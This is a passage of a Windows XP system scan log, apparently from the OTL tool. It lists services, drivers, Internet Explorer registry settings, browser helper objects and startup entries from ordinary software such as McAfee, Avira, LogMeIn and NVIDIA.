(LogMeIn) LogMeIn [Win32_Own | Auto | Running] -> %ProgramFiles%\LogMeIn\x86\LogMeIn.exe -> [2007/08/03 15:09:34 | 00,063,040 | ---- | M] (LogMeIn, Inc.)
(McAfee SiteAdvisor Service) McAfee SiteAdvisor Service [Win32_Own | Auto | Running] -> %ProgramFiles%\McAfee\SiteAdvisor\McSACore.exe -> [2008/12/05 15:51:06 | 00,206,096 | ---- | M] ()
(mcmscsvc) McAfee Services [Win32_Own | Auto | Running] -> %ProgramFiles%\McAfee\MSC\mcmscsvc.exe -> [2009/01/08 20:30:26 | 00,797,864 | ---- | M] (McAfee, Inc.)
(McNASvc) McAfee Network Agent [Win32_Own | Auto | Running] -> %CommonProgramFiles%\McAfee\MNA\McNASvc.exe -> [2008/07/18 07:02:52 | 02,482,848 | ---- | M] (McAfee, Inc.)
(McODS) McAfee Scanner [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\McAfee\VirusScan\mcods.exe -> [2009/01/09 18:51:42 | 00,365,072 | ---- | M] (McAfee, Inc.)
(McProxy) McAfee Proxy Service [Win32_Own | Auto | Running] -> %CommonProgramFiles%\McAfee\McProxy\McProxy.exe -> [2008/07/09 13:49:10 | 00,358,736 | ---- | M] (McAfee, Inc.)
(McShield) McAfee Real-time Scanner [Win32_Own | Unknown | Running] -> %ProgramFiles%\McAfee\VirusScan\Mcshield.exe -> [2008/06/20 04:41:04 | 00,144,704 | ---- | M] (McAfee, Inc.)
(McSysmon) McAfee SystemGuards [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\McAfee\VirusScan\mcsysmon.exe -> [2009/01/09 11:21:22 | 00,606,736 | ---- | M] (McAfee, Inc.)
(MpfService) McAfee Personal Firewall Service [Win32_Own | On_Demand | Running] -> %ProgramFiles%\McAfee\MPF\MpfSrv.exe -> [2008/07/09 16:36:30 | 00,884,360 | ---- | M] (McAfee, Inc.)
(MSCamSvc) MSCamSvc [Win32_Own | Auto | Running] -> %ProgramFiles%\Microsoft LifeCam\MSCamS32.exe -> [2008/04/25 12:00:26 | 00,156,704 | ---- | M] (Microsoft Corporation)
(MSK80Service) McAfee SpamKiller Service [Win32_Own | Auto | Running] -> %ProgramFiles%\McAfee\MSK\msksrver.exe -> [2008/07/09 13:35:34 | 00,025,416 | ---- | M] (McAfee, Inc.)
(NetTcpPortSharing) Net.Tcp Port Sharing Service [Win32_Shared | Disabled | Stopped] -> %SystemRoot%\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe -> [2006/10/30 02:34:02 | 00,122,880 | ---- | M] (Microsoft Corporation)
(NVSvc) NVIDIA Display Driver Service [Win32_Own | Auto | Running] -> %SystemRoot%\system32\nvsvc32.exe -> [2008/05/02 21:46:00 | 00,159,812 | ---- | M] (NVIDIA Corporation)
(odserv) Microsoft Office Diagnostics Service [Win32_Own | On_Demand | Stopped] -> %CommonProgramFiles%\Microsoft Shared\OFFICE12\ODSERV.EXE -> [2007/08/24 03:19:12 | 00,443,776 | ---- | M] (Microsoft Corporation)
(ose) Office Source Engine [Win32_Own | On_Demand | Stopped] -> %CommonProgramFiles%\Microsoft Shared\Source Engine\OSE.EXE -> [2006/10/26 14:03:08 | 00,145,184 | ---- | M] (Microsoft Corporation)
(Pctspk) PCTEL Speaker Phone [Win32_Own | Auto | Running] -> %SystemRoot%\system32\pctspk.exe -> [2001/08/17 21:36:54 | 00,086,016 | ---- | M] (PCtel, Inc.)
(Pml Driver HPZ12) Pml Driver HPZ12 [Win32_Own | Unknown | Stopped] -> %SystemRoot%\system32\HPZipm12.exe -> [2006/03/02 20:49:14 | 00,069,632 | ---- | M] (HP)
(UserAccess7) SecuROM User Access Service (V7) [Win32_Own | Auto | Running] -> %SystemRoot%\system32\UAService7.exe -> [2007/03/04 19:07:22 | 00,126,976 | ---- | M] ()
(usnjsvc) Messenger Sharing Folders USN Journal Reader service [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Windows Live\Messenger\usnsvc.exe -> [2007/10/18 10:31:54 | 00,098,328 | ---- | M] (Microsoft Corporation)
(WLSetupSvc) Windows Live Setup Service [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Windows Live\installer\WLSetupSvc.exe -> [2007/10/25 14:27:54 | 00,266,240 | ---- | M] (Microsoft Corporation)
(WMPNetworkSvc) Windows Media Player Network Sharing Service [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Windows Media Player\wmpnetwk.exe -> [2006/10/18 20:05:24 | 00,913,408 | ---- | M] (Microsoft Corporation)
(WudfSvc) Windows Driver Foundation - User-mode Driver Framework [Win32_Shared | Auto | Running] -> %SystemRoot%\system32\WudfSvc.dll -> [2006/09/28 18:56:14 | 00,055,808 | ---- | M] (Microsoft Corporation)
(0145771234431512mcinstcleanup) McAfee Application Installer Cleanup (0145771234431512) [Win32_Own | Auto | Stopped] -> -> File not found
(MBackMonitor) MBackMonitor [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\McAfee\MBK\MBackMonitor.exe -> [2009/01/09 13:05:26 | 00,068,112 | ---- | M] (McAfee)
(JavaQuickStarterService) Java Quick Starter [Win32_Own | Auto | Running] -> %ProgramFiles%\Java\jre6\bin\jqs.exe -> [2009/02/12 11:20:10 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.)
[Driver Services - Safe List]
(AC2003) AC2003 [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\AC2003.sys -> [2003/09/09 15:23:30 | 00,003,584 | ---- | M] (ABIT Computer Corp.)
(AloPort) AloPort [Kernel | Disabled | Stopped] -> %SystemRoot%\system32\drivers\AloPort.sys -> [2099/01/01 12:00:00 | 00,003,087 | ---- | M] ()
(AmdK7) AMD K7 Processor Driver [Kernel | System | Running] -> %SystemRoot%\system32\drivers\amdk7.sys -> [2008/04/13 13:31:33 | 00,037,760 | ---- | M] (Microsoft Corporation)
(Aspi32) Aspi32 [Kernel | Auto | Running] -> %SystemRoot%\system32\drivers\ASPI32.SYS -> [2006/02/05 13:15:26 | 00,016,512 | ---- | M] (Adaptec)
(avgio) avgio [Kernel | System | Running] -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\avgio.sys -> [2007/02/27 14:25:01 | 00,011,840 | ---- | M] (Avira GmbH)
(avgntflt) avgntflt [File_System | On_Demand | Running] -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\avgntflt.sys -> [2008/05/20 15:29:41 | 00,052,032 | ---- | M] (Avira GmbH)
(avipbb) avipbb [Kernel | System | Running] -> %SystemRoot%\system32\drivers\avipbb.sys -> [2008/10/30 10:21:03 | 00,075,072 | ---- | M] (Avira GmbH)
(CLEDX) Team H2O CLEDX service [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\cledx.sys -> [2005/05/09 20:08:40 | 00,033,792 | ---- | M] (Team H2O)
(EloBus) Elobus Filter Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\EloBus.sys -> [2003/07/17 12:27:18 | 00,014,848 | ---- | M] (Elo Touchsystems, Inc.)
(EloSer) Elo Serial Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\EloSer.Sys -> [2003/07/17 12:27:20 | 00,045,568 | ---- | M] (Elo Touchsystems, Inc.)
(HPZid412) IEEE-1284.4 Driver HPZid412 [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\HPZid412.sys -> [2006/03/29 07:20:08 | 00,049,664 | R--- | M] (HP)
(HPZipr12) Print Class Driver for IEEE-1284.4 HPZipr12 [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\HPZipr12.sys -> [2006/03/29 07:20:08 | 00,016,496 | R--- | M] (HP)
(HPZius12) USB to IEEE-1284.4 Translation Driver HPZius12 [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\HPZius12.sys -> [2006/03/29 07:20:09 | 00,021,568 | ---- | M] (HP)
(InCDfs) InCD File System [File_System | Disabled | Running] -> %SystemRoot%\system32\drivers\InCDfs.sys -> [2005/01/27 19:08:02 | 00,099,200 | ---- | M] (Nero AG)
(InCDPass) InCDPass [Kernel | System | Running] -> %SystemRoot%\system32\drivers\InCDpass.sys -> [2005/01/27 19:07:34 | 00,028,928 | ---- | M] (Nero AG)
(incdrm) InCD Reader [Kernel | System | Running] -> %SystemRoot%\system32\drivers\InCDrm.sys -> [2005/01/27 12:07:28 | 00,027,776 | ---- | M] (Nero AG)
(KORGUMDS) KORG USB-MIDI Driver for Windows XP [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\KORGUMDS.SYS -> [2004/07/12 01:05:00 | 00,012,544 | ---- | M] (KORG Inc.)
(LMIInfo) LogMeIn Kernel Information Provider [Kernel | Auto | Running] -> %ProgramFiles%\LogMeIn\x86\rainfo.sys -> [2008/02/28 14:31:50 | 00,012,856 | ---- | M] (LogMeIn, Inc.)
(LMImirr) LMImirr [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\lmimirr.sys -> [2007/08/03 15:04:52 | 00,010,144 | ---- | M] (LogMeIn, Inc.)
(LMIRfsClientNP) LMIRfsClientNP [File_System | Disabled | Stopped] -> %SystemRoot%\system32\LMIRfsClientNP.dll -> [2008/10/17 14:07:12 | 00,083,288 | ---- | M] (LogMeIn, Inc.)
(LMIRfsDriver) LogMeIn Remote File System Driver [File_System | Auto | Running] -> %SystemRoot%\system32\drivers\LMIRfsDriver.sys -> [2008/10/17 14:07:12 | 00,047,640 | ---- | M] (LogMeIn, Inc.)
(lusbaudio) Logitech USB Microphone [Kernel | System | Stopped] -> %SystemRoot%\system32\drivers\LVSound2.sys -> [2002/06/10 13:20:32 | 00,034,816 | ---- | M] (Logitech Inc.)
(LVBulk) LVBulk Service [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\LVBulk.sys -> [2002/06/10 13:21:02 | 00,010,254 | ---- | M] (Logitech Inc.)
(LVVI500A) LVVI500A Service [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\lvvi500a.sys -> [2002/06/10 13:24:22 | 00,188,592 | ---- | M] (Logitech Inc.)
(LXARScan) Lexmark X73 MFP Scanner [Kernel | Auto | Stopped] -> %SystemRoot%\system32\drivers\LXARScan.sys -> [2001/07/04 23:15:00 | 00,018,024 | R--- | M] ( )
(Memctl) Memctl [Kernel | On_Demand | Stopped] -> %ProgramFiles%\ABIT\ABIT uGuru\MEMCTL.SYS -> [2001/11/29 18:49:56 | 00,004,047 | ---- | M] ()
(mfeavfk) McAfee Inc. mfeavfk [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\mfeavfk.sys -> [2009/01/09 12:03:40 | 00,079,304 | ---- | M] (McAfee, Inc.)
(mfebopk) McAfee Inc. mfebopk [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\mfebopk.sys -> [2009/01/09 12:03:40 | 00,035,272 | ---- | M] (McAfee, Inc.)
(mfehidk) McAfee Inc. mfehidk [Kernel | System | Running] -> %SystemRoot%\system32\drivers\mfehidk.sys -> [2009/01/09 12:03:40 | 00,213,640 | ---- | M] (McAfee, Inc.)
(mferkdk) McAfee Inc. mferkdk [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\mferkdk.sys -> [2009/01/09 12:03:06 | 00,034,216 | ---- | M] (McAfee, Inc.)
(mfesmfk) McAfee Inc. mfesmfk [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\mfesmfk.sys -> [2009/01/09 12:03:40 | 00,040,552 | ---- | M] (McAfee, Inc.)
(MPFP) MPFP [Kernel | System | Running] -> %SystemRoot%\system32\drivers\Mpfp.sys -> [2008/10/23 13:08:54 | 00,120,136 | ---- | M] (McAfee, Inc.)
(MSHUSBVideo) NX6000/NX3000/VX5000/VX7000 Filter Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\nx6000.sys -> [2008/04/25 07:18:24 | 00,033,800 | ---- | M] (Microsoft Corporation)
(MXOPSWD) Maxtor OneTouch Security Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\mxopswd.sys -> [2007/05/03 13:37:08 | 00,022,152 | ---- | M] (Maxtor Corp.)
(nv) nv [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\nv4_mini.sys -> [2008/05/02 21:46:00 | 06,554,496 | ---- | M] (NVIDIA Corporation)
(nvax) Service for NVIDIA(R) nForce(TM) Audio Enumerator [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\nvax.sys -> [2004/10/22 09:38:28 | 00,053,376 | ---- | M] (NVIDIA Corporation)
(nvnforce) Service for NVIDIA(R) nForce(TM) Audio [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\nvapu.sys -> [2004/10/22 09:41:46 | 00,413,824 | ---- | M] (NVIDIA Corporation)
(nv_agp) NVIDIA nForce AGP Bus Filter [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\nv_agp.SYS -> [2003/03/19 02:51:00 | 00,018,688 | R--- | M] (NVIDIA Corporation)
(Ptilink) Direct Parallel Link Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\ptilink.sys -> [2003/03/31 07:00:00 | 00,017,792 | ---- | M] (Parallel Technologies, Inc.)
(Ptserlp) PCTEL Serial Device Driver for PCI [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\ptserlp.sys -> [2001/08/17 12:28:14 | 00,112,574 | ---- | M] (PCTEL, INC.)
(PxHelp20) PxHelp20 [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\pxhelp20.sys -> [2007/03/07 18:51:00 | 00,043,528 | ---- | M] (Sonic Solutions)
(rtl8139) Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\rtl8139.sys -> [2004/08/04 00:31:32 | 00,020,992 | ---- | M] (Realtek Semiconductor Corporation)
(sbp2port) SBP-2 Transport/Protocol Bus Driver [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\sbp2port.sys -> [2008/04/13 13:40:48 | 00,043,904 | ---- | M] (Microsoft Corporation)
(Secdrv) Secdrv [Kernel | Auto | Running] -> %SystemRoot%\system32\drivers\secdrv.sys -> [2007/11/13 05:25:53 | 00,020,480 | ---- | M] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
(SI3112r) Silicon Image SiI 3112 SATARaid Controller [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\SI3112r.sys -> [2004/05/12 13:01:18 | 00,097,408 | ---- | M] (Silicon Image, Inc.)
(SiFilter) SATALink driver accelerator [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\SiWinAcc.sys -> [2003/10/15 10:28:16 | 00,010,240 | ---- | M] (Silicon Image, Inc.)
(SMC1211) SMC EZ Card 10/100 PCI (SMC1211 Series) NT 5.0 Driver [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\SMC1211.sys -> [2001/07/11 10:06:12 | 00,023,153 | ---- | M] (SMC Networks Inc.)
(ssmdrv) ssmdrv [Kernel | System | Running] -> %SystemRoot%\system32\drivers\ssmdrv.sys -> [2007/03/01 09:34:22 | 00,028,352 | ---- | M] (Avira GmbH)
(usbaudio) USB Audio Driver (WDM) [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\usbaudio.sys -> [2008/04/13 13:45:12 | 00,060,032 | ---- | M] (Microsoft Corporation)
(usbvideo) USB Video Device (WDM) [Kernel | On_Demand | Running] -> %SystemRoot%\system32\drivers\usbvideo.sys -> [2008/04/13 13:46:20 | 00,121,984 | ---- | M] (Microsoft Corporation)
(Vmodem) XP Vmodem [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\vmodem.sys -> [2001/08/17 12:28:14 | 00,604,253 | ---- | M] (PCTEL, INC.)
(VNUSB) VN Series Device [Kernel | On_Demand | Stopped] -> %SystemRoot%\system32\drivers\VNUSB.sys -> [2006/04/07 16:06:38 | 00,038,496 | ---- | M] (OLYMPUS IMAGING CORP.)
(Vpctcom) XP Vpctcom [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\vpctcom.sys -> [2001/08/17 12:28:16 | 00,397,502 | ---- | M] (PCtel, Inc.)
(Vvoice) XP Vvoice [Kernel | Boot | Running] -> %SystemRoot%\system32\drivers\vvoice.sys -> [2001/08/17 12:28:16 | 00,064,605 | ---- | M] (PCtel, Inc.)
(Winflash) Winflash [Kernel | On_Demand | Stopped] -> %ProgramFiles%\ABIT\ABIT uGuru\WinFlash.sys -> [2002/09/17 11:55:06 | 00,003,548 | ---- | M] ()
(WS2IFSL) Windows Socket 2.0 Non-IFS Service Provider Support Environment [Kernel | System | Running] -> %SystemRoot%\system32\drivers\ws2ifsl.sys -> [2003/03/31 07:00:00 | 00,012,032 | ---- | M] (Microsoft Corporation)
[Registry - Safe List]
< Internet Explorer Settings [HKEY_LOCAL_MACHINE\] > -> ->
HKEY_LOCAL_MACHINE\: Main\\"Default_Page_URL" -> http://go.microsoft.com/fwlink/?LinkId=69157 ->
HKEY_LOCAL_MACHINE\: Main\\"Default_Search_URL" -> http://go.microsoft.com/fwlink/?LinkId=54896 ->
HKEY_LOCAL_MACHINE\: Main\\"Default_Secondary_Page_URL" -> ->
HKEY_LOCAL_MACHINE\: Main\\"Extensions Off Page" -> about:NoAdd-ons ->
HKEY_LOCAL_MACHINE\: Main\\"Local Page" -> %SystemRoot%\system32\blank.htm ->
HKEY_LOCAL_MACHINE\: Main\\"Search Page" -> http://go.microsoft.com/fwlink/?LinkId=54896 ->
HKEY_LOCAL_MACHINE\: Main\\"Security Risk Page" -> about:SecurityRisk ->
HKEY_LOCAL_MACHINE\: Main\\"Start Page" -> http://go.microsoft.com/fwlink/?LinkId=69157 ->
HKEY_LOCAL_MACHINE\: Search\\"CustomizeSearch" -> http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm ->
HKEY_LOCAL_MACHINE\: Search\\"SearchAssistant" -> http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm ->
< Internet Explorer Settings [HKEY_CURRENT_USER\] > -> ->
HKEY_CURRENT_USER\: Main\\"Local Page" -> C:\WINDOWS\system32\blank.htm ->
HKEY_CURRENT_USER\: Main\\"Page_Transitions" -> ->
HKEY_CURRENT_USER\: Main\\"Search Page" -> http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch ->
HKEY_CURRENT_USER\: Main\\"SearchMigratedDefaultName" -> Google ->
HKEY_CURRENT_USER\: Main\\"SearchMigratedDefaultURL" -> http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 ->
HKEY_CURRENT_USER\: Main\\"Start Page" -> http://www.google.com/webhp ->
HKEY_CURRENT_USER\: "ProxyEnable" -> 0 ->
HKEY_CURRENT_USER\: "ProxyOverride" -> *.local ->
< HOSTS File > (27 bytes and 1 lines) -> C:\WINDOWS\System32\drivers\etc\Hosts ->
127.0.0.1 localhost
< BHO's [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\ ->
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} [HKLM] -> %CommonProgramFiles%\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [Adobe PDF Reader Link Helper] -> [2006/10/22 23:08:42 | 00,062,080 | ---- | M] (Adobe Systems Incorporated)
{27B4851A-3207-45A2-B947-BE8AFE6163AB} [HKLM] -> %ProgramFiles%\McAfee\MSK\mskapbho.dll [McAfee Phishing Filter] -> [2008/10/17 11:45:10 | 00,247,312 | ---- | M] ()
{7DB2D5A0-7241-4E79-B68D-6309F01C5231} [HKLM] -> %ProgramFiles%\McAfee\VirusScan\scriptsn.dll [scriptproxy] -> [2008/06/20 04:41:56 | 00,058,688 | ---- | M] (McAfee, Inc.)
{9030D464-4C02-4ABF-8ECC-5164760863C6} [HKLM] -> %CommonProgramFiles%\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [Windows Live Sign-in Helper] -> [2007/09/20 09:30:18 | 00,328,752 | ---- | M] (Microsoft Corporation)
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} [HKLM] -> %ProgramFiles%\Google\GoogleToolbarNotifier\5.0.926.3450\swg.dll [Google Toolbar Notifier BHO] -> [2009/02/08 10:56:50 | 00,657,904 | ---- | M] (Google Inc.)
{B164E929-A1B6-4A06-B104-2CD0E90A88FF} [HKLM] -> %ProgramFiles%\McAfee\SiteAdvisor\McIEPlg.dll [McAfee SiteAdvisor BHO] -> [2008/11/14 12:25:26 | 00,150,032 | ---- | M] ()
{DBC80044-A445-435b-BC74-9C25C1C588A9} [HKLM] -> %ProgramFiles%\Java\jre6\bin\jp2ssv.dll [Java(tm) Plug-In 2 SSV Helper] -> [2009/02/12 11:20:10 | 00,035,840 | ---- | M] (Sun Microsystems, Inc.)
{E7E6F031-17CE-4C07-BC86-EABFE594F69C} [HKLM] -> %ProgramFiles%\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [JQSIEStartDetectorImpl Class] -> [2009/02/12 11:20:11 | 00,073,728 | ---- | M] (Sun Microsystems, Inc.)
< Internet Explorer ToolBars [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar ->
"{0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064}" [HKLM] -> %ProgramFiles%\McAfee\SiteAdvisor\McIEPlg.dll [McAfee SiteAdvisor Toolbar] -> [2008/11/14 12:25:26 | 00,150,032 | ---- | M] ()
< Internet Explorer ToolBars [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ ->
WebBrowser\\"{EF99BD32-C1FB-11D2-892F-0090271D4F88}" [HKLM] -> Reg Error: Key does not exist or could not be opened. [Yahoo! Toolbar] -> File not found
< Run [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ->
"Google Desktop Search" -> ["C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup] -> File not found
"LogMeIn GUI" -> %ProgramFiles%\LogMeIn\x86\LogMeInSystray.exe ["C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"] -> [2007/08/03 15:09:34 | 00,063,048 | ---- | M] (LogMeIn, Inc.)
"mcagent_exe" -> %ProgramFiles%\McAfee.com\Agent\mcagent.exe ["C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey] -> [2008/07/11 17:48:54 | 00,641,208 | ---- | M] (McAfee, Inc.)
"nForce Tray Options" -> %SystemRoot%\system32\sstray.exe [sstray.exe /r] -> [2003/10/23 08:13:08 | 00,073,728 | R--- | M] (NVIDIA Corporation)
"NvCplDaemon" -> %SystemRoot%\system32\nvcpl.dll [RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup] -> [2008/05/02 21:46:00 | 13,529,088 | ---- | M] (NVIDIA Corporation)
"NvMediaCenter" -> %SystemRoot%\system32\nvmctray.dll [RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit] -> [2008/05/02 21:46:00 | 00,086,016 | ---- | M] (NVIDIA Corporation)
"nwiz" -> %SystemRoot%\system32\nwiz.exe [nwiz.exe /install] -> [2008/05/02 21:46:00 | 01,630,208 | ---- | M] ()
"SunJavaUpdateSched" -> %ProgramFiles%\Java\jre6\bin\jusched.exe ["C:\Program Files\Java\jre6\bin\jusched.exe"] -> [2009/02/12 11:20:10 | 00,148,888 | ---- | M] (Sun Microsystems, Inc.)
"UserFaultCheck" -> [%systemroot%\system32\dumprep 0 -u] -> File not found
< RunOnce [HKEY_LOCAL_MACHINE\] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ->
"Malwarebytes' Anti-Malware" -> [C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent] -> File not found
< Run [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ->
"Google Update" -> %UserProfile%\Local Settings\Application Data\Google\Update\GoogleUpdate.exe ["C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c] -> [2008/09/02 23:12:43 | 00,133,104 | ---- | M] (Google Inc.)
"googletalk" -> %ProgramFiles%\Google\Google Talk\googletalk.exe [C:\Program Files\Google\Google Talk\googletalk.exe /autostart] -> [2007/01/01 16:22:02 | 03,739,648 | ---- | M] (Google)
< All Users Startup Folder > -> C:\Documents and Settings\All Users\Start Menu\Programs\Startup ->
-> %AllUsersProfile%\Start Menu\Programs\Startup\Acrobat Assistant.lnk.disabled -> [2004/07/30 14:57:46 | 00,000,910 | ---- | M] ()
-> %AllUsersProfile%\Start Menu\Programs\Startup\Adobe Gamma Loader.exe.lnk.disabled -> [2004/08/02 20:27:46 | 00,000,890 | ---- | M] ()
-> %AllUsersProfile%\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk.disabled -> [2004/07/30 14:50:14 | 00,000,890 | ---- | M] ()
-> %AllUsersProfile%\Start Menu\Programs\Startup\Adobe Reader Speed Launch.lnk.disabled -> [2007/03/31 08:04:05 | 00,001,757 | ---- | M] ()
-> %AllUsersProfile%\Start Menu\Programs\Startup\Device Detector 2.lnk.disabled -> [2004/11/17 22:41:30 | 00,001,650 | ---- | M] ()
%AllUsersProfile%\Start Menu\Programs\Startup\Device Detector 3.lnk -> %ProgramFiles%\Olympus\DeviceDetector\DevDtct2.exe -> [2007/02/22 17:32:12 | 00,118,784 | ---- | M] (OLYMPUS IMAGING CORP.)
-> %AllUsersProfile%\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk.disabled -> [2006/12/05 00:03:41 | 00,001,808 | ---- | M] ()
-> %AllUsersProfile%\Start Menu\Programs\Startup\Microsoft Office.lnk.disabled -> [2004/08/04 11:52:14 | 00,001,730 | ---- | M] ()
-> %AllUsersProfile%\Start Menu\Programs\Startup\Microsoft Works Calendar Reminders.lnk.disabled -> [2004/07/25 11:48:37 | 00,000,875 | ---- | M] ()
< David Startup Folder > -> C:\Documents and Settings\David\Start Menu\Programs\Startup ->
%UserProfile%\Start Menu\Programs\Startup\ERUNT AutoBackup.lnk -> %ProgramFiles%\ERUNT\AUTOBACK.EXE -> [2005/10/20 12:04:08 | 00,038,912 | ---- | M] ()
%UserProfile%\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk -> %ProgramFiles%\Microsoft Office\Office12\ONENOTEM.EXE -> [2007/12/07 19:44:36 | 00,101,440 | ---- | M] (Microsoft Corporation)
%UserProfile%\Start Menu\Programs\Startup\OpenOffice.org 2.4.lnk -> %ProgramFiles%\OpenOffice.org 2.4\program\quickstart.exe -> [2008/01/21 15:41:28 | 00,393,216 | ---- | M] ()
< Software Policy Settings [HKEY_CURRENT_USER] > -> HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer ->
< CurrentVersion Policy Settings - Explorer [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
\\"NoDriveAutoRun" -> [67108863] -> File not found
\\"NoDriveTypeAutoRun" -> [323] -> File not found
\\"NoDrives" -> [0] -> File not found
< CurrentVersion Policy Settings - System [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System
\\"dontdisplaylastusername" -> [0] -> File not found
\\"legalnoticecaption" -> [] -> File not found
\\"legalnoticetext" -> [] -> File not found
\\"shutdownwithoutlogon" -> [1] -> File not found
\\"undockwithoutlogon" -> [1] -> File not found
\\"DisableRegistryTools" -> [0] -> File not found
< CurrentVersion Policy Settings - Explorer [HKEY_CURRENT_USER] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
\\"NoDriveTypeAutoRun" -> [323] -> File not found
\\"NoDriveAutoRun" -> [67108863] -> File not found
\\"NoDrives" -> [0] -> File not found
< CurrentVersion Policy Settings - System [HKEY_CURRENT_USER] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System ->
< Internet Explorer Menu Extensions [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\ ->
E&xport to Microsoft Excel -> %ProgramFiles%\Microsoft Office\Office12\EXCEL.EXE [res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000] -> [2008/10/18 18:30:22 | 17,931,616 | ---- | M] (Microsoft Corporation)
< Internet Explorer Extensions [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\ ->
{2670000A-7350-4f3c-8081-5663EE0C6C49}:{48E73304-E1D6-4330-914C-F5F514E3486C} [HKLM] -> %ProgramFiles%\Microsoft Office\Office12\ONBttnIE.dll [Button: Send to OneNote] -> [2007/12/13 01:20:58 | 00,606,288 | ---- | M] (Microsoft Corporation)
